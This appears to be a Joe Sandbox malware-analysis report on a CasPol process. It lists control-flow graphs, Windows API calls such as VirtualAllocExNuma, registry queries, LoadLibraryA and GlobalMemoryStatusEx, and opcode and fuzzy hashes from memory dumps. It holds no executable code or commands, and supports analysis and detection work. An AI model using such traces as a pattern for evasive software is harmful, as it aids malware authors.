                                                                control_flow_graph 1671 23f0878-23f0893 1672 23f0895-23f0898 1671->1672 1673 23f089a-23f089c call 23f042c 1672->1673 1674 23f08a6-23f08a9 1672->1674 1678 23f08a1 1673->1678 1676 23f08ab-23f08b2 1674->1676 1677 23f08b3-23f08b6 1674->1677 1679 23f0908-23f090b 1677->1679 1680 23f08b8-23f0903 1677->1680 1678->1674 1681 23f090d 1679->1681 1682 23f091c-23f091f 1679->1682 1680->1679 1686 23f0917 1681->1686 1683 23f0947-23f094a 1682->1683 1684 23f0921-23f093a 1682->1684 1687 23f094c-23f0966 1683->1687 1688 23f096b-23f096e 1683->1688 1695 23f0a76-23f0aaa 1684->1695 1696 23f0940-23f0942 1684->1696 1686->1682 1687->1688 1690 23f09bd-23f09c0 1688->1690 1691 23f0970-23f09ac 1688->1691 1693 23f09cf-23f09d2 1690->1693 1694 23f09c2 1690->1694 1691->1681 1692 23f09b2 1691->1692 1692->1681 1698 23f09b8 1692->1698 1699 23f09d4-23f09f4 call 23f0554 1693->1699 1700 23f0a01-23f0a04 1693->1700 1701 23f09ca 1694->1701 1708 23f0aac-23f0aef 1695->1708 1709 23f0af0-23f0b43 VirtualAllocExNuma 1695->1709 1696->1683 1698->1690 1729 23f09f9-23f09fc 1699->1729 1704 23f0a06 1700->1704 1705 23f0a11-23f0a14 1700->1705 1701->1693 1711 23f0a0c 1704->1711 1706 23f0a16 call 23f0c08 1705->1706 1707 23f0a21-23f0a24 1705->1707 1716 23f0a1c 1706->1716 1712 23f0a2b-23f0a2e 1707->1712 1713 23f0a26 1707->1713 1708->1709 1719 23f0b4c-23f0b69 1709->1719 1720 23f0b45-23f0b4b 1709->1720 1711->1705 1717 23f0a3f-23f0a42 1712->1717 1718 23f0a30-23f0a34 1712->1718 1713->1712 1716->1707 1723 23f0a4f-23f0a52 1717->1723 1724 23f0a44 1717->1724 1718->1687 1722 23f0a3a 1718->1722 1720->1719 1722->1717 1726 23f0a5c-23f0a5e 1723->1726 1727 23f0a54-23f0a5b 1723->1727 1736 23f0a44 call 23f2929 1724->1736 1737 23f0a44 call 23f2a14 1724->1737 1731 23f0a65-23f0a68 1726->1731 1732 23f0a60 1726->1732 1729->1700 1731->1672 1734 23f0a6e-23f0a75 1731->1734 1732->1731 1733 23f0a4a 1733->1723 1736->1733 1737->1733
                                                                APIs
                                                                  • Part of subcall function 023F042C: Sleep.KERNEL32(00000000), ref: 023F0BDF
                                                                • VirtualAllocExNuma.KERNEL32(00000000,00000000,?,?,?,?), ref: 023F0B36
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: AllocNumaSleepVirtual
                                                                • String ID:
                                                                • API String ID: 1104050493-0
                                                                • Opcode ID: 654d05d2a0a7127b07424d55504df324f4b668d43e2e2dec517e18d020dd2a13
                                                                • Instruction ID: 0093d1b4d81ec204d787350421200dd110e12261f1be0c2f8b9aeb5a4c085398
                                                                • Opcode Fuzzy Hash: 654d05d2a0a7127b07424d55504df324f4b668d43e2e2dec517e18d020dd2a13
                                                                • Instruction Fuzzy Hash: 1881B270E002488FDF64CFADE8847AEBBB0EB49314F20446AD649E7396D7359C55CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1738 5df7b41-5df7b5f 1739 5df7b84-5df7b98 1738->1739 1740 5df7b61-5df7b6b 1738->1740 1745 5df7bae-5df7baf 1739->1745 1746 5df7b9a 1739->1746 1741 5df7b6d-5df7b7e 1740->1741 1742 5df7b80-5df7b83 1740->1742 1741->1742 1749 5df7bd4-5df7be2 1745->1749 1750 5df7bb1-5df7bbb 1745->1750 1747 5df7b9c-5df7b9f 1746->1747 1748 5df7ba1-5df7ba8 1746->1748 1747->1748 1748->1745 1754 5df7be9-5df7bea 1749->1754 1755 5df7be4-5df7be6 1749->1755 1751 5df7bbd-5df7bce 1750->1751 1752 5df7bd0-5df7bd3 1750->1752 1751->1752 1759 5df7bec 1754->1759 1760 5df7bf1-5df7c29 1754->1760 1757 5df7bed-5df7bef 1755->1757 1758 5df7be8 1755->1758 1757->1760 1758->1754 1759->1757 1765 5df7c31-5df7c37 1760->1765 1766 5df7c3e 1765->1766 1767 5df7c45-5df7c5c LdrInitializeThunk 1766->1767 1768 5df7da5-5df7dc2 call 5df6758 call 5df68e8 1767->1768 1769 5df7c62-5df7c7c 1767->1769 1783 5df7dc7-5df7dd0 1768->1783 1769->1768 1773 5df7c82-5df7c9c 1769->1773 1777 5df7c9e-5df7ca0 1773->1777 1778 5df7ca2 1773->1778 1780 5df7ca5-5df7d00 1777->1780 1778->1780 1789 5df7d06 1780->1789 1790 5df7d02-5df7d04 1780->1790 1791 5df7d09-5df7da3 1789->1791 1790->1791 1791->1783
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: de39c7dbd9f8981b945b7e5eb3928fbae6c878d70be44550d111eaaba6ef0bbe
                                                                • Instruction ID: 6d132a33babd6bbe738beb48c203f63e99be754dc6e3d9bfa5cb68190054698b
                                                                • Opcode Fuzzy Hash: de39c7dbd9f8981b945b7e5eb3928fbae6c878d70be44550d111eaaba6ef0bbe
                                                                • Instruction Fuzzy Hash: 1771E230B043059FDB05EB74D844BEA7BB6EF86304F1589AAE545DB392EB34D809CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1808 5ee7440-5ee748c LdrInitializeThunk 1812 5ee7493-5ee749f 1808->1812 1813 5ee769f-5ee76b2 1812->1813 1814 5ee74a5-5ee74ae 1812->1814 1815 5ee76d9-5ee76dd 1813->1815 1816 5ee76d4 1814->1816 1817 5ee74b4-5ee74c9 1814->1817 1818 5ee76df 1815->1818 1819 5ee76e8 1815->1819 1816->1815 1821 5ee74cb-5ee74de 1817->1821 1822 5ee74e3-5ee74fe 1817->1822 1818->1819 1823 5ee76e9 1819->1823 1824 5ee7673-5ee7677 1821->1824 1830 5ee750c 1822->1830 1831 5ee7500-5ee750a 1822->1831 1823->1823 1826 5ee7679 1824->1826 1827 5ee7682 1824->1827 1826->1827 1827->1813 1832 5ee7511-5ee7513 1830->1832 1831->1832 1833 5ee752d-5ee75c5 1832->1833 1834 5ee7515-5ee7528 1832->1834 1852 5ee75c7-5ee75d1 1833->1852 1853 5ee75d3 1833->1853 1834->1824 1854 5ee75d8-5ee75da 1852->1854 1853->1854 1855 5ee75dc-5ee75de 1854->1855 1856 5ee761d-5ee7671 1854->1856 1857 5ee75ec 1855->1857 1858 5ee75e0-5ee75ea 1855->1858 1856->1824 1860 5ee75f1-5ee75f3 1857->1860 1858->1860 1860->1856 1861 5ee75f5-5ee761b 1860->1861 1861->1856
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 59de705b3c0ebec14539f1d24d07974a11b83d18585e8870296fc7a05c84c65d
                                                                • Instruction ID: 40cfae72e78088411b7bf53318070d52a3e27803e1b0e8483d45c513180f1d51
                                                                • Opcode Fuzzy Hash: 59de705b3c0ebec14539f1d24d07974a11b83d18585e8870296fc7a05c84c65d
                                                                • Instruction Fuzzy Hash: FA614E70A102599BDB14EFB8D4587AEB7F2FF85348F108929D446A7390DF349945CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1871 5df7e50-5df7ea8 1876 5df7f0f-5df7f16 1871->1876 1877 5df7eaa-5df7ee1 1871->1877 1878 5df7f4f-5df7f59 1876->1878 1877->1878 1880 5df7f5b-5df7f8b 1878->1880 1881 5df7fc7-5dfe7a8 1878->1881 1880->1881 1886 5dfe7aa-5dfe7ad 1881->1886 1887 5dfe7b0-5dfe7b3 1881->1887 1886->1887 1888 5dfe7ba-5dfe81c RegOpenKeyExW 1887->1888 1889 5dfe81e-5dfe824 1888->1889 1890 5dfe825-5dfe85d 1888->1890 1889->1890 1894 5dfe85f-5dfe868 1890->1894 1895 5dfe870 1890->1895 1894->1895 1896 5dfe871 1895->1896 1896->1896
                                                                APIs
                                                                • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 05DFE80C
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: d1e198c212eb5d9146823238a8bdecc9eb9373e0ec1b9fbf8f7f29509941d989
                                                                • Instruction ID: 6dd7b9f96b265b29477dee7ec0c5bb14ed7b729a321c6a19ddbcc417fe479fe4
                                                                • Opcode Fuzzy Hash: d1e198c212eb5d9146823238a8bdecc9eb9373e0ec1b9fbf8f7f29509941d989
                                                                • Instruction Fuzzy Hash: 1061D3B18093898FD702DF68C4946CEBFB1FF06318F1A819BD5849B253D735890ACB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2215 5df7fd0-5df7fd8 2217 5df7fda-5df7fe3 2215->2217 2218 5df8046-5df8051 2215->2218 2219 5dfe758-5dfe7a8 2217->2219 2220 5df80be-5df80c7 2218->2220 2221 5df8053-5df8082 2218->2221 2225 5dfe7aa-5dfe7ad 2219->2225 2226 5dfe7b0-5dfe7b3 2219->2226 2220->2219 2229 5df8087-5df808e 2221->2229 2225->2226 2228 5dfe7ba-5dfe81c RegOpenKeyExW 2226->2228 2230 5dfe81e-5dfe824 2228->2230 2231 5dfe825-5dfe85d 2228->2231 2229->2229 2232 5df8090-5df80b8 2229->2232 2230->2231 2237 5dfe85f-5dfe868 2231->2237 2238 5dfe870 2231->2238 2237->2238 2239 5dfe871 2238->2239 2239->2239
                                                                APIs
                                                                • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 05DFE80C
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: 250a766990cdb6ac5b0770189305c4b4a3bbce67d5b81faf5e404fd1b0b7b936
                                                                • Instruction ID: 6a23dd4f2cf287e41971832a6147c69bdd35489cc7ae22ae4328f1d90fba7d37
                                                                • Opcode Fuzzy Hash: 250a766990cdb6ac5b0770189305c4b4a3bbce67d5b81faf5e404fd1b0b7b936
                                                                • Instruction Fuzzy Hash: 615178B18483898FDB00CFA8C484ACEFFF5FF49318F1A81AAD504AB252D3759945CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2240 5dfe6f9-5dfe6fa 2241 5dfe6fc-5dfe700 2240->2241 2242 5dfe701-5dfe702 2240->2242 2241->2242 2243 5dfe709-5dfe717 2242->2243 2244 5dfe704-5dfe705 2242->2244 2245 5dfe73c-5dfe74c 2243->2245 2246 5dfe719-5dfe723 2243->2246 2250 5dfe74e 2245->2250 2251 5dfe7a5-5dfe7a8 2245->2251 2247 5dfe738-5dfe73b 2246->2247 2248 5dfe725-5dfe736 2246->2248 2248->2247 2253 5dfe755-5dfe756 2250->2253 2254 5dfe750-5dfe752 2250->2254 2255 5dfe7aa-5dfe7ad 2251->2255 2256 5dfe7b0-5dfe7b3 2251->2256 2257 5dfe759-5dfe7a4 2253->2257 2254->2257 2258 5dfe754 2254->2258 2255->2256 2259 5dfe7ba-5dfe81c RegOpenKeyExW 2256->2259 2257->2251 2258->2253 2260 5dfe81e-5dfe824 2259->2260 2261 5dfe825-5dfe85d 2259->2261 2260->2261 2265 5dfe85f-5dfe868 2261->2265 2266 5dfe870 2261->2266 2265->2266 2267 5dfe871 2266->2267 2267->2267
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb82087eb386368d92c62906e404cf188d970ea677434668358538ae2995ba5b
                                                                • Instruction ID: 9934718d8442075aa7e1380585a32658e8541213135df07b8147ed7ebba055fb
                                                                • Opcode Fuzzy Hash: bb82087eb386368d92c62906e404cf188d970ea677434668358538ae2995ba5b
                                                                • Instruction Fuzzy Hash: 064169B4904348DFDB10CF99C444A9EBBF6FF89304F1A806AE508AB361D7759845CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2535 5eec004-5eeddf6 2537 5eeddf8-5eeddfe 2535->2537 2538 5eede01-5eede08 2535->2538 2537->2538 2539 5eede0a-5eede10 2538->2539 2540 5eede13-5eedeb2 CreateWindowExW 2538->2540 2539->2540 2542 5eedebb-5eedef3 2540->2542 2543 5eedeb4-5eedeba 2540->2543 2547 5eedef5-5eedef8 2542->2547 2548 5eedf00 2542->2548 2543->2542 2547->2548 2549 5eedf01 2548->2549 2549->2549
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05EEDEA2
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: edae0c38e9cbb1905447e2e9579acfc9d2eedb92973bb4f00c4b616849c120ed
                                                                • Instruction ID: a11ad229df8414e7588690ba14cf339102133e71bab50a549f2a326783eb32e3
                                                                • Opcode Fuzzy Hash: edae0c38e9cbb1905447e2e9579acfc9d2eedb92973bb4f00c4b616849c120ed
                                                                • Instruction Fuzzy Hash: 7051C0B1D143499FDB14CF99C984ADEFBB5BF48314F24852EE819AB210D774A885CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2550 5eedd86-5eeddf6 2553 5eeddf8-5eeddfe 2550->2553 2554 5eede01-5eede08 2550->2554 2553->2554 2555 5eede0a-5eede10 2554->2555 2556 5eede13-5eede4b 2554->2556 2555->2556 2557 5eede53-5eedeb2 CreateWindowExW 2556->2557 2558 5eedebb-5eedef3 2557->2558 2559 5eedeb4-5eedeba 2557->2559 2563 5eedef5-5eedef8 2558->2563 2564 5eedf00 2558->2564 2559->2558 2563->2564 2565 5eedf01 2564->2565 2565->2565
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05EEDEA2
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: 5e57c11494b35118c1586d942b02f89041fa040660c5a9f5ba31d4f1bf103b8a
                                                                • Instruction ID: 7af4fb0e6579099ffab21031e02e5899bbc3bca480a54959f68504367dc74dec
                                                                • Opcode Fuzzy Hash: 5e57c11494b35118c1586d942b02f89041fa040660c5a9f5ba31d4f1bf103b8a
                                                                • Instruction Fuzzy Hash: 9451D2B1D103499FDB14CF99C984ADEFBB5BF48314F24862AE819AB250D774A885CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2566 5dfe9b0-5dfe9cf 2567 5dfe9f4-5dfea79 2566->2567 2568 5dfe9d1-5dfe9db 2566->2568 2574 5dfea7b-5dfea7e 2567->2574 2575 5dfea81-5dfea8b 2567->2575 2569 5dfe9dd-5dfe9ee 2568->2569 2570 5dfe9f0-5dfe9f3 2568->2570 2569->2570 2574->2575 2576 5dfea8d-5dfea95 2575->2576 2577 5dfea97-5dfead9 RegQueryValueExW 2575->2577 2576->2577 2578 5dfeadb-5dfeae1 2577->2578 2579 5dfeae2-5dfeb1c 2577->2579 2578->2579 2583 5dfeb1e 2579->2583 2584 5dfeb26 2579->2584 2583->2584 2585 5dfeb27 2584->2585 2585->2585
                                                                APIs
                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 05DFEAC9
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: QueryValue
                                                                • String ID:
                                                                • API String ID: 3660427363-0
                                                                • Opcode ID: 41fe2819b31998cb7ab02c4d4f36f6daec2ce2053917b7f9f0eb9fbd8c52ba76
                                                                • Instruction ID: c2abc670cbc531da94ca15991fca8839b490b77b17ec05d9c074f27d7b268d9e
                                                                • Opcode Fuzzy Hash: 41fe2819b31998cb7ab02c4d4f36f6daec2ce2053917b7f9f0eb9fbd8c52ba76
                                                                • Instruction Fuzzy Hash: 864113B1E04298DFCB10CFA9C584ADEBBB5BF48314F15846AE959AB360D7749805CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2586 23fd4ad-23fd50f 2587 23fd548-23fd592 LoadLibraryA 2586->2587 2588 23fd511-23fd51b 2586->2588 2595 23fd59b-23fd5cc 2587->2595 2596 23fd594-23fd59a 2587->2596 2588->2587 2589 23fd51d-23fd51f 2588->2589 2590 23fd542-23fd545 2589->2590 2591 23fd521-23fd52b 2589->2591 2590->2587 2593 23fd52f-23fd53e 2591->2593 2594 23fd52d 2591->2594 2593->2593 2597 23fd540 2593->2597 2594->2593 2600 23fd5ce-23fd5d2 2595->2600 2601 23fd5dc 2595->2601 2596->2595 2597->2590 2600->2601 2602 23fd5d4 2600->2602 2603 23fd5dd 2601->2603 2602->2601 2603->2603
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 9619c7dfb36c92c3728d85b8590e93d89684f2f421e64c2e2ced83785c7f5cd3
                                                                • Instruction ID: b8cc8553b6fa88feb017472875c219488ce60841f640072f869eaeaa881b2fff
                                                                • Opcode Fuzzy Hash: 9619c7dfb36c92c3728d85b8590e93d89684f2f421e64c2e2ced83785c7f5cd3
                                                                • Instruction Fuzzy Hash: FB3127B0D0035D8FDB54CFA9E4897DEBBF1AB09318F148129E819A7340D7749446CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 1b9328949d2c09490c96628aa0938520b9d17e200038acd544806fb80dbb73f3
                                                                • Instruction ID: 9ade943084788f8852ab4fe92b352f8b75f90925ea94cc49aadb0a289af01242
                                                                • Opcode Fuzzy Hash: 1b9328949d2c09490c96628aa0938520b9d17e200038acd544806fb80dbb73f3
                                                                • Instruction Fuzzy Hash: 863135B0D0424D8FDB54CFA9E98979EBBF1FB48318F148529E819AB380D7749485CF92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 05DFEAC9
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: QueryValue
                                                                • String ID:
                                                                • API String ID: 3660427363-0
                                                                • Opcode ID: 00a4b7fd726273e21a6195b7e2db5d9fa81e6bd6c50fa065e8a48faac9eef8ab
                                                                • Instruction ID: 0ef6b6431cae0560e3c33238e6f19add002f26ff9412a1871c6c22085ba8cf49
                                                                • Opcode Fuzzy Hash: 00a4b7fd726273e21a6195b7e2db5d9fa81e6bd6c50fa065e8a48faac9eef8ab
                                                                • Instruction Fuzzy Hash: AD31D0B1D042589FCB20CF99C984A9EFBF5FF48714F15842AE919AB310D774A945CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 05DFE80C
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: 77087d6b50f606dcbbc22051cfa6c3f4c5dfd18b9c11d8d2e338e2f1dd7912ab
                                                                • Instruction ID: 7bf107f7c4ff9e9546b3033c2600f67c2942ce6c0e545451b0ababaa7a5dc209
                                                                • Opcode Fuzzy Hash: 77087d6b50f606dcbbc22051cfa6c3f4c5dfd18b9c11d8d2e338e2f1dd7912ab
                                                                • Instruction Fuzzy Hash: 813112B0D043498FDB10CF99C588A8EFBF5FF48314F29856AE909AB350C7759885CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05EEAE92), ref: 05EEAF7F
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID:
                                                                • API String ID: 1890195054-0
                                                                • Opcode ID: bf8c8f2bb390722249a659f84af35ecbc12f4e732e67a1b8bc9b4037034dfed8
                                                                • Instruction ID: a93a69903410f3a52c022583aff3a647abb2d4febc6c4b20a5070a0575faf6ef
                                                                • Opcode Fuzzy Hash: bf8c8f2bb390722249a659f84af35ecbc12f4e732e67a1b8bc9b4037034dfed8
                                                                • Instruction Fuzzy Hash: 2521BBB1D043598FCB10CFA9D4487EEFBB0BF48224F05856AD968A7250D7389985CBE0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05EEF82E,?,?,?,?,?), ref: 05EEF8EF
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 5f59c9216668d5a37fd3b860ac21afa4f5a13ddcb17a2c93aa9a6aa43d5c4cd4
                                                                • Instruction ID: 424972fced8a4a69b91311d36e0022ba5e20da9631ed2e822bdeb57dc3e9b1cd
                                                                • Opcode Fuzzy Hash: 5f59c9216668d5a37fd3b860ac21afa4f5a13ddcb17a2c93aa9a6aa43d5c4cd4
                                                                • Instruction Fuzzy Hash: 8821E3B5900349AFDB10CF99D584ADEBBF8FB48324F14846AE958A7310D374A954CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAllocExNuma.KERNEL32(00000000,00000000,?,?,?,?), ref: 023F0B36
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: AllocNumaVirtual
                                                                • String ID:
                                                                • API String ID: 4233825816-0
                                                                • Opcode ID: f2441f7816c7444ed457f09e1741072b14d190e7acd109480a380db2abc21d27
                                                                • Instruction ID: 59c5859d1a6e7418ed27bcd68cfe966e45a494b845f29bd69993fb28ce4a8317
                                                                • Opcode Fuzzy Hash: f2441f7816c7444ed457f09e1741072b14d190e7acd109480a380db2abc21d27
                                                                • Instruction Fuzzy Hash: 2C2167B18002899FCB10CFA9D884BDFBFF4EF88324F24845AE559A7211C3799945CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RtlEncodePointer.NTDLL(00000000), ref: 023F593A
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID:
                                                                • API String ID: 2118026453-0
                                                                • Opcode ID: 9443eeb1c00dc188674edc833780f3eecbca67264fcaee2d998da6e6ff0fc8d0
                                                                • Instruction ID: 1731307176b47c050a33176752bf75c2f6764cd19fdf25ff642af903c154f9e3
                                                                • Opcode Fuzzy Hash: 9443eeb1c00dc188674edc833780f3eecbca67264fcaee2d998da6e6ff0fc8d0
                                                                • Instruction Fuzzy Hash: 5F21D1B28003498FDB50DFA9E8487DFBBF4FB08324F60816AD948A7691D3385545CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAllocExNuma.KERNEL32(00000000,00000000,?,?,?,?), ref: 023F0B36
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: AllocNumaVirtual
                                                                • String ID:
                                                                • API String ID: 4233825816-0
                                                                • Opcode ID: 0ad955547107b78997c3098fbee53488f01bc1d903b93a49c5158ccfd7a3da8d
                                                                • Instruction ID: 8536afe394db94f85d0155002d38f880da2a85f54bc8f23a28c4e4d596ac64b8
                                                                • Opcode Fuzzy Hash: 0ad955547107b78997c3098fbee53488f01bc1d903b93a49c5158ccfd7a3da8d
                                                                • Instruction Fuzzy Hash: 1E1153B59003499FCB50CF9AD888BDFBBF4FB48324F148429E658A7251D375A940CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05EEAE92), ref: 05EEAF7F
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.784038218.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5ee0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID:
                                                                • API String ID: 1890195054-0
                                                                • Opcode ID: 6e8124e7a26c566ab01dc9627aecc9f1a24469385813566344113c32977ce32b
